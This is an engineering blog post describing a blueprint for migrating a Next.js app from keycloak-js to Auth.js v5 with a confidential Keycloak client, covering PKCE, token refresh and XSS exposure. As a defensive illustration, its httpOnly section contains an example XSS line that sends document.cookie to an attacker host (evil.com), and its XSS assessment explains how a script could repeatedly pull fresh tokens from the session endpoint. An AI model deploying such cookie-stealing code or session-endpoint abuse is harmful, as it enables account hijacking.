Migrating from keycloak-js to Auth.js v5 — A Hybrid SSR Auth Blueprint for Next.js
We recently completed the architecture blueprint for migrating a production Next.js application from client-side keycloak-js to server-side Auth.js v5 with a confidential Keycloak client. This post shares the full blueprint — the reasoning, the architecture, the security tradeoffs, and the migration roadmap — so other teams considering the same move can learn from our research.
This is not a tutorial. It is an honest engineering document: where the security model genuinely improves, where it does not, and what we decided to defer.
1. Why Migrate?
Our application currently authenticates via keycloak-js — Keycloak’s official browser library that handles login, token storage, and refresh entirely on the client side. There is nothing wrong with keycloak-js itself — it is actively maintained and works well for what it does. The current auth flow functions correctly in production.
However, client-side token management has an inherent security ceiling: any token accessible to JavaScript is accessible to an XSS attacker. To raise that ceiling, we need server-side token management — and keycloak-js can only run in the browser. Keycloak’s own server-side Node.js adapter (keycloak-connect) has been deprecated since 2022 due to lack of Node.js maintainers on the Keycloak team, with their recommendation being to use standard OIDC libraries instead.
For Next.js server-side auth, the two leading open-source options are Auth.js v5 (formerly NextAuth.js — the largest ecosystem) and Better Auth (newer, better TypeScript inference, built-in 2FA/RBAC). As of 2026, Auth.js maintenance has been taken over by the Better Auth team, signaling consolidation rather than fragmentation. We chose Auth.js v5 for its mature Keycloak provider, proven PKCE support, and encrypted cookie sessions — with a clear succession path via Better Auth if needed.
This is not a forced migration away from a broken tool. It is a deliberate choice to move tokens off the browser for stronger security, while gaining SSR auth capabilities as a bonus:
| Concern | Current (keycloak-js) | Target (Auth.js v5) |
|---|---|---|
| Token storage | sessionStorage (JS-accessible) | httpOnly cookie (invisible to JS) |
| XSS exposure | Attacker script can read tokens | Tokens never reach document |
| SSR auth | Impossible — tokens exist only in browser | auth() available in Server Components |
| Token refresh | Client polls every 60s (kc.updateToken) | Server refreshes on-demand, automatically |
| Token access | sessionStorage.getItem("accessToken") | useSession() -> session.accessToken |
| Logout | keycloak.logout() (client-only) | signOut() — federated (Keycloak session also ends) |
| Client type | Public (no secret) | Confidential (server holds secret) |
| Auth library | keycloak-js (~50KB) | None — useSession() is built into next-auth |
In short: the browser currently manages the full token lifecycle — storage, refresh, rotation, logout. After migration, all of that moves to the Next.js server. The browser becomes an auth consumer, not an auth manager. It calls useSession() to read the current token, and nothing else.
Three Patterns: Client-Only, Hybrid, and Full BFF
There are three ways to handle auth in a Next.js app. Each moves more responsibility from the browser to the server:
Client-only: Browser --manages tokens--> Gateway
Hybrid: Browser --reads token----> Gateway (server manages tokens)
Full BFF: Browser --cookie only----> Next.js --> Gateway (server proxies everything)
| Client-only (current) | Hybrid (our target) | Full BFF | |
|---|---|---|---|
| Who manages tokens | Browser — stores, refreshes, rotates | Server — stores, refreshes, rotates | Server — same as hybrid |
| Who makes API calls | Browser -> Gateway directly | Browser -> Gateway directly | Browser -> Next.js -> Gateway |
| Token in browser | Access + refresh (both in sessionStorage) | Access only (via useSession()) | None |
| XSS damage | Full token theft, long-term access | Access token obtainable via session endpoint (see Honest XSS Assessment below) | No tokens to steal |
| API call latency | 1 hop | 1 hop | 2 hops (extra server round-trip) |
| Migration effort | — | Change token source + add server auth | Rewrite every API route as server proxy |
| Code change scope | — | Auth layer only | Auth layer + every API client file |
Why hybrid: it eliminates the biggest risk (refresh token theft leading to long-term session hijacking) with the least disruption. The browser still gets a short-lived access token to call the Gateway directly — same data flow as today, just a different token source. No API routes need rewriting, no extra latency, and the CSR architecture stays intact.
Full BFF would eliminate even the short-lived access token exposure, but at significant cost: every API endpoint needs a corresponding Next.js proxy route, every API call adds a server hop, and the Next.js server becomes a bottleneck for all API traffic. That tradeoff is not worth it for our current threat model — and the hybrid pattern already covers the critical attack surface.
If the threat model changes in the future (a real XSS incident, stricter compliance requirements, or sensitive operations like payments), BFF becomes a natural step 2 built on top of the hybrid foundation. The auth infrastructure is identical in both paths — only the Axios token source would be replaced by server-side proxy routes. Nothing built in the hybrid phase is thrown away.
A note on CSR-heavy codebases: our application is predominantly client-side rendered — most pages fetch data from the browser via Axios. This migration does not change that. We are not converting the app to SSR. The primary goal is the security upgrade (getting refresh tokens off the browser), not SSR auth capabilities. Features like auth() in Server Components become available as a bonus, but the app continues to work as a CSR app with useSession() as the token source.
2. Architecture Overview
All users live in a Keycloak realm, not in any specific client. A client is just a doorway — it defines how authentication happens, not who can authenticate. Today everyone logs in through a public client. After migration, they log in through a new confidential client — same credentials, same roles, same permissions, different door.
Keycloak Realm
├── Users: user-A, user-B, user-C ... ← realm-level, shared across all clients
├── Client: app-frontend ← current door (public, browser-side)
└── Client: app-bff ← new door (confidential, server-side)
Current State
Browser --[keycloak-js]--> Keycloak (public client: app-frontend)
│
├── stores tokens in sessionStorage
├── refreshes via kc.updateToken(60) every 60s
└── sends Bearer token via Axios interceptor --> Spring Cloud Gateway
Target State
Browser --> Next.js (Auth.js v5) --> Keycloak (confidential client: app-bff)
│ │
│ ├── server holds tokens in encrypted httpOnly cookie
│ ├── refreshes on-demand with mutex (no polling)
│ └── federated logout via Keycloak end_session_endpoint
│
└── reads accessToken from useSession() --> Spring Cloud Gateway
The Gateway validates JWT signatures against the realm’s public key, so it does not care which client issued the token. Both clients can coexist during transition without any gateway changes.
Component Architecture — Before
graph TB
subgraph "Next.js"
subgraph "Browser (CSR)"
UI[React App]
KJS[keycloak-js]
SS[(sessionStorage)]
end
subgraph "Server"
SSR[Page rendering only<br/>no auth logic]
end
end
subgraph "Keycloak"
KC_PUB["app-frontend<br/>(public client)"]
end
subgraph "Gateway"
GW[Spring Cloud Gateway<br/>JWT validation]
end
KJS -->|"PKCE + login"| KC_PUB
KC_PUB -->|"tokens"| KJS
KJS -->|"store tokens"| SS
UI -->|"read token from sessionStorage"| SS
UI -->|"API calls with Bearer token"| GW
style SSR fill:#ddd,stroke:#999
style KJS fill:#f90,color:#fff
style SS fill:#f90,color:#fff
style KC_PUB fill:#f90,color:#fff
The Next.js server plays no role in auth — it only renders pages. All token management happens in the browser.
Component Architecture — After
Single auth path. keycloak-js, sessionStorage, and the public client are all removed.
graph TB
subgraph "Next.js"
subgraph "Browser (CSR)"
UI[React App]
Session["useSession()<br/>reads accessToken"]
end
subgraph "Server"
Route["/auth-api/auth/[...nextauth]<br/>route.ts"]
Auth["auth.ts<br/>NextAuth config"]
TR["token-refresh.ts<br/>mutex + Keycloak call"]
Cookie[(Encrypted httpOnly<br/>session cookie)]
end
UI -->|"useSession()<br/>GET /auth-api/auth/session"| Route
end
subgraph "Keycloak"
KC_CONF["app-bff<br/>(confidential client)"]
end
subgraph "Gateway"
GW[Spring Cloud Gateway<br/>JWT validation]
end
Route --> Auth
Auth --> TR
TR -->|"POST /token<br/>(refresh)"| KC_CONF
Auth -->|"session cookie"| Cookie
UI -->|"API calls with Bearer token"| GW
style Route fill:#4A90D9,color:#fff
style Auth fill:#4A90D9,color:#fff
style TR fill:#4A90D9,color:#fff
style Cookie fill:#4A90D9,color:#fff
style KC_CONF fill:#4A90D9,color:#fff
style Session fill:#4A90D9,color:#fff
Component Architecture — Full BFF (Future Step 2)
If the threat model ever demands zero client-side token exposure, the architecture evolves into a full BFF proxy. The browser never holds an access token — every API call routes through the Next.js server, which attaches the Bearer token server-side. The auth foundation (Auth.js, token refresh, cookie session) stays the same; what changes is how API calls reach the Gateway.
graph TB
subgraph "Next.js"
subgraph "Browser (CSR)"
UI[React App]
Session["useSession()<br/>session status only — no token"]
end
subgraph "Server"
Route["/auth-api/auth/[...nextauth]<br/>route.ts"]
Auth["auth.ts<br/>NextAuth config"]
TR["token-refresh.ts<br/>mutex + Keycloak call"]
Cookie[(Encrypted httpOnly<br/>session cookie)]
Proxy["API proxy routes"]
end
UI -->|"useSession()<br/>(auth status only)"| Route
UI -->|"API calls<br/>(cookie only, no token)"| Proxy
Proxy -->|"decrypt cookie<br/>attach Bearer token"| Cookie
end
subgraph "Keycloak"
KC_CONF["app-bff<br/>(confidential client)"]
end
subgraph "Gateway"
GW[Spring Cloud Gateway<br/>JWT validation]
end
Route --> Auth
Auth --> TR
TR -->|"POST /token<br/>(refresh)"| KC_CONF
Auth -->|"session cookie"| Cookie
Proxy -->|"Bearer token<br/>(server-to-server)"| GW
style Route fill:#4A90D9,color:#fff
style Auth fill:#4A90D9,color:#fff
style TR fill:#4A90D9,color:#fff
style Cookie fill:#4A90D9,color:#fff
style KC_CONF fill:#4A90D9,color:#fff
style Session fill:#4A90D9,color:#fff
style Proxy fill:#9B59B6,color:#fff
The purple box is the only new piece — proxy routes that forward API calls with the Bearer token attached server-side. Everything else is identical to the hybrid architecture.
Keycloak Clients: Two-Client Coexistence
| Client | Type | Secret | Used by |
|---|---|---|---|
app-frontend | Public | None | keycloak-js (browser) |
app-bff | Confidential | Server-side | Auth.js (Next.js server) |
We create a separate confidential client rather than converting the existing one because keycloak-js is a public client library — it does not send a client_secret. Flipping the existing client to confidential would break every active session instantly. Two clients let us migrate at our own pace with zero downtime. After migration and a monitoring period, we deactivate the old public client.
How CSR Works with Server-Side Auth
Our application is predominantly CSR — most pages render in the browser and fetch data via Axios. A natural question: if tokens are managed server-side, how do client-side API calls get the access token?
Auth.js solves this with SessionProvider and useSession(). On page load, SessionProvider makes a single call to the server (GET /auth-api/auth/session), which decrypts the httpOnly cookie and returns the access token as JSON. This is cached in memory and shared across all components — subsequent useSession() calls read from cache, not the network.
1. Page loads
2. SessionProvider -> GET /auth-api/auth/session (one network call)
3. Server decrypts httpOnly cookie -> checks token expiry
4. Token expired? -> server refreshes with Keycloak, updates cookie
5. Returns { accessToken, ... } as JSON response
6. SessionProvider caches in memory
7. Components call useSession() -> read from cache (no network)
8. Axios sends API calls with cached accessToken
9. Tab sits idle -> next useSession() triggers server-side refresh
From the developer’s perspective, the only code change is the token source:
// Before
const token = sessionStorage.getItem("accessToken");
// After
const { data: session } = useSession();
const token = session.accessToken;
Everything else — storage, refresh, rotation, expiry, logout — is invisible to the component. The CSR pattern stays intact.
| Concern | Impact |
|---|---|
| Extra network call on page load | One fetch to session endpoint, cached after. Same pattern as keycloak-js init() today |
| Token refresh timing | Server refreshes on next session fetch, not by polling. SessionProvider re-fetches on window focus and configurable interval |
| SSR auth capabilities mostly unused | Not a problem — security upgrade is the primary goal, SSR auth is a bonus |
| Initial loading state | Session not available until first fetch completes, but keycloak-js has the same onReady delay today |
3. PKCE: Defense-in-Depth
PKCE (Proof Key for Code Exchange, RFC 7636) prevents stolen authorization codes from being exchanged for tokens.
An honest question: we are using a confidential client with a client_secret — do we still need PKCE? The client_secret already prevents an attacker from exchanging a stolen auth code, since they do not have the secret.
In practice, PKCE adds limited value on top of a properly secured confidential client. But we use it anyway for four reasons:
- OAuth 2.1 mandates it for all clients — including confidential. This is not arbitrary: OAuth 2.0 (2012) did not require PKCE and learned the hard way. Real-world attacks showed that authorization codes could be intercepted via browser mechanisms (referrer headers, open redirectors, browser history) and replayed even against confidential clients. PKCE was added in RFC 7636 (2015) to close this gap, and OAuth 2.1 retroactively mandates it for everyone rather than leaving it optional.
- It is free —
checks: ["pkce", "state"]in Auth.js config. Zero performance cost, zero maintenance. - Secret compromise insurance — if
client_secretever leaks, PKCE still blocks auth code theft. - Auth code injection protection — an attacker injecting their own auth code into a victim’s session is prevented by PKCE (the
code_verifierwill not match), but not byclient_secretalone.
| Scenario | client_secret alone | client_secret + PKCE |
|---|---|---|
| Attacker intercepts auth code | Blocked — no secret | Blocked — no secret AND no code_verifier |
client_secret gets leaked | Vulnerable — attacker can exchange stolen codes | Still blocked — no code_verifier (bound to session) |
| Auth code injection into victim’s session | Not prevented | Blocked — code_verifier mismatch |
How PKCE Works
sequenceDiagram
participant C as Next.js Server
participant KC as Keycloak
C->>C: Generate code_verifier (random 43-128 chars)
C->>C: code_challenge = BASE64URL(SHA256(code_verifier))
C->>C: Store code_verifier in httpOnly cookie
C->>KC: GET /authorize?code_challenge=xxx&code_challenge_method=S256
KC-->>C: Authorization code (code=abc)
C->>KC: POST /token (code=abc, code_verifier=original)
KC->>KC: Verify SHA256(code_verifier) == stored code_challenge
alt Match
KC-->>C: access_token + refresh_token
else Mismatch (attacker)
KC-->>C: 400 Bad Request
end
Step by step:
- Generate a secret — the Next.js server creates a random string called
code_verifier(43-128 characters). This is the “answer” to a puzzle only this session knows. - Hash it — the server computes
code_challenge = BASE64URL(SHA256(code_verifier)). This is the “puzzle” — easy to compute from the answer, impossible to reverse. - Store the answer — Auth.js stores the
code_verifierin an httpOnly cookie so it can retrieve it later. (This is an Auth.js implementation detail — RFC 7636 does not prescribe how the verifier is stored.) - Send the puzzle to Keycloak — the login request includes the
code_challenge. Keycloak stores it and associates it with the authorization code it is about to issue. - User logs in — Keycloak authenticates the user and redirects back with an authorization code (
code=abc). - Exchange code for tokens — the server sends the authorization code AND the original
code_verifierto Keycloak’s token endpoint. - Keycloak verifies — it hashes the received
code_verifierand checks if it matches thecode_challengefrom step 4. If yes, tokens are issued. If no (an attacker intercepted the code but does not have the verifier), rejected.
The key insight: even if an attacker steals the authorization code in step 5, they cannot complete step 6 without the code_verifier — which only exists in the server’s httpOnly cookie and was never sent through the browser’s address bar or referrer headers.
client_secret vs PKCE — What Each Proves
| Mechanism | What it proves |
|---|---|
client_secret | ”This request comes from our registered app” (authenticates the application) |
PKCE code_verifier | ”This token exchange comes from the same session that started the login” (authenticates the session) |
They protect against different attack vectors and are complementary. In our case, client_secret is the primary defense. PKCE is the safety net.
4. Token Lifecycle
Full Login Flow
sequenceDiagram
participant B as Browser
participant N as Next.js (Auth.js v5)
participant K as Keycloak
B->>N: GET /auth-api/auth/signin
N->>N: Generate PKCE code_verifier + code_challenge
N->>B: 302 → Keycloak /authorize
B->>K: User login form
K->>B: 302 → /auth-api/auth/callback/keycloak?code=abc
B->>N: GET /callback?code=abc
N->>K: POST /token (code + code_verifier + client_secret)
K-->>N: { access_token, refresh_token, id_token }
N->>N: jwt callback → encrypt tokens into session cookie
N->>B: Set-Cookie: authjs.session-token (httpOnly, Secure)
Note over B: No tokens in sessionStorage or JS memory
Token Refresh with Mutex
flowchart TD
A[jwt callback triggered] --> B{token expired?}
B -- No --> C[Return existing token]
B -- Yes --> D{refreshPromise exists?}
D -- Yes --> E[Await existing promise]
D -- No --> F[Create new refreshPromise]
F --> G[POST Keycloak /token<br/>grant_type=refresh_token]
G --> H{Success?}
H -- Yes --> I[Updated JWT<br/>new accessToken + expiresAt]
H -- No --> J[JWT with error:<br/>RefreshTokenError]
E --> K[Return shared result]
I --> L[Clear refreshPromise in finally]
J --> L
style J fill:#f96,stroke:#333
style I fill:#6f9,stroke:#333
style E fill:#69f,stroke:#333
The mutex ensures that concurrent requests (multiple Server Components rendering simultaneously) trigger only one Keycloak refresh call. This is critical because Keycloak invalidates refresh tokens after first use (rotation).
Multi-Pod Consideration
The mutex above is a module-level variable (refreshPromise) — it only prevents races within a single Node.js process. On Kubernetes, your application may run across multiple pods, and each pod has its own mutex that knows nothing about the others.
The risk: if the same user’s token expires and two of their requests land on different pods at the same moment, both pods try to refresh with the same refresh token. Keycloak rotates refresh tokens on use — the first pod succeeds and gets a new refresh token, the second pod’s request arrives with the now-invalidated old token and fails.
Pod A --[refresh_token_v1]--> Keycloak --> new refresh_token_v2
Pod B --[refresh_token_v1]--> Keycloak --> token already used (rotated)
In practice, this is less likely than it sounds:
- Narrow window — the race only happens if the same user’s token expires and two requests hit different pods in the same instant. Normal browsing generates sequential requests, not simultaneous ones.
- Load balancer affinity — most Kubernetes ingress controllers support session affinity (sticky sessions), which routes the same user to the same pod. If enabled, cross-pod races are nearly impossible.
- Graceful failure — if it does happen, the affected pod returns
RefreshTokenError, the client detects it viauseSession(), and the user re-authenticates. Annoying, but not a data loss or security issue.
If this becomes a real problem at scale, the fix is a distributed mutex — using Redis to coordinate refresh locks across pods. But this adds complexity and a Redis dependency to the auth path, so we only add it if monitoring shows actual cross-pod refresh failures.
| Scale | Mutex strategy | When to use |
|---|---|---|
| Single pod / dev | Module-level refreshPromise | Default starting point |
| Multi-pod with sticky sessions | Same — affinity prevents cross-pod races | Standard K8s config |
| Multi-pod without affinity, high traffic | Redis distributed lock (SETNX with TTL) | Only if monitoring shows refresh failures |
5. Migration Roadmap
The migration is structured as a series of independently deployable phases. Each phase builds on the previous one, and the two auth systems (keycloak-js and Auth.js) coexist during the transition — there is no big-bang switch.
graph LR
S0["ADR<br/>✅ done"] --> R1["Research<br/>🔵 in progress"]
S0 --> R2["Architecture<br/>🔵 in progress"]
R1 --> S1["Server Token<br/>Management"]
R2 --> S1
R2 --> S3
S1 --> S2["Middleware<br/>Route Protection"]
S1 --> S3["Axios Token<br/>Source Switch"]
S2 --> S4a["Provider &<br/>Layout"]
S3 --> S4a
S4a --> S4b["Page-by-Page<br/>Migration"]
S4a --> S4c["Login/Logout<br/>& E2E"]
S4b --> S5["Cleanup &<br/>Removal"]
S4c --> S5
S5 --> S6["Client<br/>Consolidation"]
style S0 fill:#6f9,stroke:#333
style R1 fill:#69f,color:#fff
style R2 fill:#69f,color:#fff
style S1 fill:#ddd,stroke:#333
style S2 fill:#ddd,stroke:#333
style S3 fill:#ddd,stroke:#333
style S4a fill:#ddd,stroke:#333
style S4b fill:#ddd,stroke:#333
style S4c fill:#ddd,stroke:#333
style S5 fill:#ddd,stroke:#333
style S6 fill:#ddd,stroke:#333
| Phase | Scope |
|---|---|
| ADR | Architecture Decision Record: chose Auth.js v5 + confidential client + hybrid pattern |
| Research | PKCE deep-dive + Auth.js v5 API research |
| Architecture | Full migration architecture design + security model |
| Server Token Management | Auth.js config, token refresh with mutex, API route handler, TypeScript type augmentation |
| Middleware Route Protection | Next.js middleware for route protection using auth() wrapper |
| Axios Token Source Switch | Axios interceptor reads token from useSession() instead of sessionStorage |
| Provider & Layout | SessionProvider placement and layout restructuring, auth guard disposition |
| Page-by-Page Migration | Mechanical useAuth() to useSession() migration across all pages and test files |
| Login/Logout & E2E | Login/logout flow + E2E test fixture migration |
| Cleanup & Removal | Remove keycloak-js, public client, sessionStorage — single auth path |
| Client Consolidation | Rename the confidential Keycloak client to the canonical name after monitoring period |
Middleware and Axios phases can run in parallel. Page migration and login/logout can also run in parallel.
6. Key Decisions
| # | Decision | Rationale |
|---|---|---|
| 1 | Auth.js v5 over custom PKCE implementation | Auth.js handles PKCE internally; a prior proof-of-concept branch proved custom PKCE is unnecessary maintenance |
| 2 | Confidential client | Server holds client_secret — stronger than public client, enables secure server-to-server token refresh |
| 3 | PKCE + client_secret together | Defense-in-depth: client_secret authenticates the app, PKCE binds the session. OAuth 2.1 mandates both |
| 4 | Custom basePath for auth routes | Avoids routing conflicts with existing proxy configuration |
| 5 | Hybrid token pattern | Server holds tokens in cookie; client gets accessToken via useSession() for API calls |
| 6 | Coexistence during transition | keycloak-js and Auth.js run in parallel. No big-bang switch. Each phase is independently deployable |
| 7 | Mutex for token refresh | Keycloak rotates refresh tokens — concurrent refreshes would invalidate the token. Module-level promise prevents races |
7. Security Comparison
Attack Surface
| Attack | Current (keycloak-js) | Target (Auth.js v5) |
|---|---|---|
| XSS token theft | sessionStorage readable by any script | httpOnly cookie — JS cannot access |
| CSRF | N/A (Bearer token in header) | SameSite=Lax cookie + CSRF token (Auth.js built-in) |
| Auth code interception | PKCE protects (keycloak-js native) | PKCE + client_secret (double protection) |
| Token in URL/referrer | N/A (code flow, not implicit) | Same |
| Session fixation | Client-managed session | Server-managed, encrypted cookie |
| Man-in-the-middle | Tokens transit via JS | Tokens never leave server; cookie has Secure flag |
Why httpOnly Cookies Matter
The httpOnly flag is the single most important property of the session cookie. When a cookie is marked httpOnly, the browser enforces a hard rule: JavaScript cannot access it — not through document.cookie, not through any API. The cookie still travels automatically with every HTTP request to the server, but it is invisible to any script running on the page.
This matters because of XSS. If an attacker injects a script into the page:
// Without httpOnly -- attacker reads the cookie and exfiltrates it
fetch("https://evil.com/steal?token=" + document.cookie);
// With httpOnly -- document.cookie doesn't contain the session cookie
// the attacker gets nothing useful
The cookie is there, the browser sends it, but no script can read it. It is like a locked mailbox — the mail carrier delivers and picks up mail, but a stranger cannot open it.
In our migration, the encrypted session cookie containing the refresh token is httpOnly. This is what makes the refresh token completely unreachable to XSS — it is not in sessionStorage, not in a JS variable, and not readable from document.cookie. It only travels between the browser and the Next.js server as an automatic HTTP header that JavaScript never sees.
Cookie Security Properties
Auth.js configures these properties on the session cookie automatically:
| Property | Value | Purpose |
|---|---|---|
HttpOnly | true | JS cannot read the cookie — refresh token invisible to XSS |
Secure | true | Cookie only sent over HTTPS — prevents interception on plain HTTP |
SameSite | Lax | Cookie not sent on cross-site POST requests — mitigates CSRF |
Path | Scoped to auth routes | Cookie not sent on every request |
| Encryption | AES (Auth.js internal) | Cookie payload encrypted at rest — even if somehow intercepted, contents are unreadable |
| Chunking | Automatic | Auth.js splits cookies >4KB into .0, .1, etc. — handles large Keycloak JWTs |
What This Migration Does and Does Not Protect
A common question: does moving tokens server-side prevent all token theft?
No. As long as the browser needs an access token to call APIs, code running in that browser can potentially access it. This is a fundamental constraint, not a design flaw.
What changes is the attack surface, not the theoretical possibility:
| Token | Current (keycloak-js) | After migration (Auth.js) |
|---|---|---|
| Access token | sessionStorage.getItem("accessToken") — one line, silent | Must call fetch("/auth-api/auth/session") and read the response — noisier, more steps |
| Refresh token | Also in sessionStorage — same one-line theft | Completely unreachable — never leaves the server, never returned by any endpoint |
Honest XSS Assessment
An important nuance: the access token obtained via the session endpoint is not truly one-shot. Every call to GET /auth-api/auth/session triggers the server-side jwt callback, which automatically refreshes the access token if it is expired. The browser sends the httpOnly cookie along with the request — so the server refreshes on the caller’s behalf, even if that caller is a malicious script.
This means an XSS attacker can call fetch("/auth-api/auth/session") repeatedly and obtain continuously fresh access tokens for the entire lifetime of the refresh token (typically hours to days). The attacker does not need the refresh token directly — the browser’s automatic cookie attachment does the work.
What the hybrid pattern actually prevents vs. what it does not:
| Scenario | Current (keycloak-js) | After migration (hybrid) |
|---|---|---|
| Steal refresh token for persistent offline access | One-liner from sessionStorage | Impossible — refresh token never leaves server |
| Obtain fresh access tokens while XSS is active | Read from sessionStorage, silently | Call session endpoint, server auto-refreshes |
| Maintain access after XSS is cleaned up | Yes — stolen refresh token still works | No — attacker has no refresh token to replay |
| Exfiltrate tokens to external server | Both tokens easily copied | Access token only, and it expires in minutes |
The real security win: not that XSS during an attack is fully prevented (it is not, in the hybrid pattern), but that the blast radius after cleanup is dramatically smaller. Today, a stolen refresh token means the attacker keeps access until the token is manually revoked. After migration, once the XSS vulnerability is patched, the attacker’s access dies with the next token expiry.
To eliminate even the active-XSS exposure, the full BFF pattern (step 2) removes accessToken from the session response entirely. Rate-limiting the session endpoint is also a viable intermediate mitigation.
Beyond This Migration: Full BFF Proxy
After the hybrid migration, the remaining exposure is the short-lived access token readable via useSession(). To eliminate even that, a full BFF proxy would route every API call through the Next.js server — the browser would hold only a session cookie, never an access token.
Our position: the hybrid migration is step 1 — it eliminates refresh token theft with manageable effort. Full BFF is a natural step 2 if the threat model demands it. The hybrid foundation carries over — only the Axios token source would be replaced by server-side proxy routes.
8. Considerations
If you are planning a similar migration, here are the areas that required the most careful thinking:
-
Edge Runtime compatibility: Next.js middleware runs in Edge Runtime, which does not support all Node.js APIs. If your auth configuration imports modules that use
fs, streams, or other Node.js-specific APIs (common with logging libraries), you will need a split configuration — a minimal Edge-safe config for middleware and the full config for route handlers. Auth.js v5 supports this pattern. -
Cookie size limits: Keycloak JWTs can be large, especially with many realm roles and group memberships. Browser cookie limits (typically 4KB per cookie) can be exceeded. Auth.js handles this with automatic cookie chunking, but you should measure your real token sizes before going to production.
-
Multi-pod token refresh coordination: The in-process mutex only prevents races within a single Node.js process. In a Kubernetes environment with multiple pods, you need session affinity or a distributed locking mechanism. Start with sticky sessions and add Redis-based locking only if monitoring shows actual failures.
-
Feature flag design for safe rollback: Running two auth systems in parallel requires a feature flag to toggle between them at runtime. Design this before writing any migration code — it is the foundation for safe, incremental deployment and rollback.
-
trailingSlashconfiguration: If your Next.js config usestrailingSlash: true, verify that Auth.js callback URLs work correctly. The trailing slash rewrite can cause Keycloak redirect URI mismatches. Register both URL variants in Keycloak as a safety measure. -
Static root layout conflicts: If your root layout uses
force-static, any Server Component that callsauth()(which reads cookies/headers) will fail at build time. Verify which route segments need to opt out withforce-dynamic. -
Production secret management: Session encryption keys and Keycloak client secrets must be generated with cryptographic randomness, stored in a secrets manager (e.g., Vault, AWS Secrets Manager), and rotated on a schedule. Add startup validation that rejects placeholder values in production.
Glossary
| Term | Definition |
|---|---|
| PKCE | Proof Key for Code Exchange — binds auth code to the session that requested it |
| Confidential client | OAuth client with a client_secret stored server-side (vs public client with no secret) |
| BFF | Backend-for-Frontend — the server-side layer that handles auth on behalf of the browser |
| Federated logout | Ending the session at both Next.js and Keycloak simultaneously |
| Mutex | Mutual exclusion — ensures only one token refresh runs at a time |
| httpOnly cookie | Browser cookie that JavaScript cannot read via document.cookie |
This blueprint was developed as part of a production migration. The hybrid pattern is live in our staging environment and progressing toward production. If you are considering the same migration, I hope this saves you some of the research time it cost us.